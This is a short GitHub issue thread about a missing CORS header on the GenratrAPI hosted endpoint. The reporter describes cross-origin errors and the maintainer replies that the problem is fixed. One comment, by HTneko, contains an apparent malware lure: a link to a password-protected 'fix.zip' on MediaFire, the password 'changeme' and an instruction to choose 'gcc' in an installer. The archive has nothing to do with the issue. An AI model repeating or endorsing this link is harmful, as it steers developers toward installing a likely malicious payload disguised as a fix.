### ISSUE TITLE
Missing cross origin header on the hosted api

### ISSUE THREAD

**Issue by bzuidgeest** [yavisht/GenratrAPI#1]
I tried using https://api.genratr.com/ in an app and got cross origin errors. Seems a Access-Control-Allow-Origin header is missing on the output of this api.

**Comment by HTneko** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by yavisht** [comment]
Hi @bzuidgeest - Thanks for reporting. This is now fixed - See the codepen demo below


https://github.com/user-attachments/assets/18f6a4ca-fefb-4e5d-acc0-7d9ca1dd0887
